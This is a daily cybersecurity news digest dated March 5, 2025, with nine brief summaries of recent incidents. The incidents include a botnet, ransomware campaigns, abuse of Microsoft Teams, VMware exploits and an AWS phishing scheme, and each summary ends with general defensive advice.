DJBSEC's CyberNews 3-5-25

Created in March 05, 2025

2025   ·   CyberNews   ·   News

Cybersecurity Stories Summary

Story1. New Eleven11Bot Botnet Infects 86,000 Devices for DDoS Attacks

A newly discovered botnet, Eleven11Bot, has infected over 86,000 devices to launch large-scale Distributed Denial-of-Service (DDoS) attacks. The malware primarily targets routers, IoT devices, and unpatched servers, taking advantage of weak security settings. Security researchers warn that the botnet’s rapid growth could enable attackers to disrupt critical online services. Organizations and individuals are advised to update firmware, use strong passwords, and disable unnecessary remote access features to mitigate risks.
Read more here

Story2. Hackers Abusing Microsoft Teams Quick Assist to Gain Remote Access

Cybercriminals are exploiting Microsoft Teams’ Quick Assist feature to gain unauthorized remote access to corporate networks. Attackers pose as IT support personnel, convincing victims to grant them control over their systems. Once inside, they deploy malware, steal sensitive data, or launch further attacks. Security experts recommend disabling Quick Assist for non-essential users and educating employees on recognizing social engineering threats.
Read more here

Story3. Hackers Attacking 4,000 ISPs Worldwide in Coordinated Cyber Assault

A sophisticated cyberattack campaign has been detected targeting over 4,000 internet service providers (ISPs) across multiple countries. The attackers are exploiting vulnerabilities in ISP infrastructure to intercept traffic, steal data, and launch further cyberattacks. Researchers suspect that nation-state actors may be involved in these intrusions. Affected ISPs are urged to patch vulnerabilities and implement stronger network security controls to prevent further breaches.
Read more here

Story4. 96% of Ransomware Incidents Now Involve Data Exfiltration

A new study reveals that 96% of ransomware attacks now include data exfiltration, meaning cybercriminals steal sensitive data before encrypting files. This tactic increases pressure on victims to pay ransom, as attackers threaten to leak stolen data if demands are not met. The shift in ransomware tactics highlights the need for organizations to strengthen both data protection and incident response strategies. Security experts recommend regular backups, network segmentation, and endpoint detection solutions.
Read more here

Story5. U.S. Seizes $31 Million Stolen in Cryptocurrency Cybercrime Operations

The U.S. government has successfully recovered $31 million in stolen cryptocurrency linked to cybercriminal activities. The funds were originally stolen through sophisticated phishing scams and ransomware operations targeting individuals and businesses. Authorities worked with blockchain analysis firms to track and seize the assets. The seizure is part of a broader effort to crack down on illicit cryptocurrency transactions.
Read more here

Story6. VMware Security Flaws Exploited in Active Cyberattacks

Security researchers have identified multiple VMware vulnerabilities that are being actively exploited in cyberattacks. These flaws allow attackers to gain remote access, execute arbitrary code, and compromise virtualized environments. Organizations using VMware products are strongly urged to apply patches and implement security best practices. The incident underscores the critical need for timely software updates to prevent exploitation.
Read more here

Story7. Hackers Deliver XWorm Malware via Malicious Windows Registry Files

A new cyberattack campaign is using malicious Windows registry files to distribute the XWorm malware. This sophisticated technique allows attackers to execute the malware without triggering traditional antivirus alerts. Once deployed, XWorm can steal credentials, exfiltrate sensitive data, and enable remote access for further exploitation. Users are advised to avoid running untrusted registry files and implement endpoint security solutions.
Read more here

Story8. Threat Actor “JavaGhost” Targets AWS Environments with Phishing Scheme

A newly identified cyber threat, dubbed “JavaGhost,” is targeting AWS cloud environments through sophisticated phishing campaigns. Attackers trick victims into installing malicious Java-based payloads that allow unauthorized access to cloud resources. The malware enables credential theft, privilege escalation, and data exfiltration. Security professionals recommend implementing multi-factor authentication (MFA) and regularly reviewing cloud security policies to defend against such attacks.
Read more here

Story9. Microsoft Teams Being Used to Deploy Black Basta and Cactus Ransomware

Cybercriminals are using Microsoft Teams as a delivery mechanism to spread the Black Basta and Cactus ransomware strains. Attackers infiltrate Teams environments and send malicious files to unsuspecting users, leading to system encryption and data theft. The technique bypasses traditional email security controls, making it a highly effective attack vector. Organizations are urged to restrict external file-sharing in Teams and educate employees on recognizing suspicious messages.
Read more here



Enjoy Reading This Article?

Here are some more articles you might like to read next:

  • DJBSEC's CyberNews 2025-07-11
  • DJBSEC's CyberNews 2025-07-10
  • DJBSEC's CyberNews 2025-07-09
  • DJBSEC's CyberNews 2025-07-08
  • DJBSEC's CyberNews 2025-07-07